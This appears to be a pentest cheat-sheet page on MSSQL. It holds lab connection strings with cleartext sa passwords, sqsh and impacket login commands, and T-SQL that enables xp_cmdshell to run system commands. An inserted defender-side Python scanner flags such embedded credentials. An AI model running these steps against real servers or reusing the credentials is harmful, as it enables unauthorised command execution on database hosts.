MSSQL

SQL Server is a common service to find exposed to the outside world.

Requires: valid credentials. With them, commands can be executed on the victim.

Identifying Passwords

# from tally htb
SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

# example format
PROVIDER=DNOSCPDB;DATA SOURCE=HOME;User ID=sa;PWD=cyb3rs3cn00b;DATABASE=rfdb
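
A defender-side check for strings like the two above, as an added example that is not part of the original page: it scans config text for connection strings that carry a cleartext password and reports them without echoing the secret. The function names, the key alias list and the sample file contents are assumptions made for this example.

```python
import re

# Connection-string keys of interest, mapped to a normalized field name.
ALIASES = {
    "uid": "user", "user id": "user",
    "pwd": "password", "password": "password",
    "server": "host", "data source": "host",
}

# key=value where the value runs to the next ';', quote or end of line.
# Characters such as '#', '@' and '=' inside a password are kept.
FIELD = re.compile(
    r"(?i)(?<![A-Za-z])(user id|uid|pwd|password|server|data source)"
    r"\s*=\s*([^;\"'\r\n]*)"
)


def scan_line(line):
    """Return normalized fields (user, password, host) found on one line."""
    fields = {}
    for key, value in FIELD.findall(line):
        fields.setdefault(ALIASES[key.lower()], value.strip())
    return fields


def find_embedded_credentials(text):
    """One finding per line that carries a non-empty cleartext password."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = scan_line(line)
        if not fields.get("password"):
            continue
        user = fields.get("user", "")
        findings.append({
            "line": lineno,
            "host": fields.get("host", ""),
            "user": user,
            "privileged": user.lower() == "sa",  # built-in sysadmin login
            "password_length": len(fields["password"]),  # never echo the secret
        })
    return findings


# Constructed sample config file reusing the two strings from this section.
SAMPLE = """\
# app settings
conn1 = SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
conn2 = PROVIDER=DNOSCPDB;DATA SOURCE=HOME;User ID=sa;PWD=cyb3rs3cn00b;DATABASE=rfdb
conn3 = Server=db01;Database=app;Integrated Security=SSPI;
"""
```

The `conn3` line uses integrated authentication and produces no finding, which is the form the other two should be migrated to.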

Connecting to server

# sqsh -S $ip -U sa -P $pass
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"

# via impacket mssqlclient
# -windows-auth is recommended when authenticating with a domain account; use the machine's NetBIOS name as the domain
impacket-mssqlclient -db orcharddb -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

Code Execution

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE; 
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE; 
go
xp_cmdshell 'whoami';
go

# Check for linked servers
sp_linkedservers
go
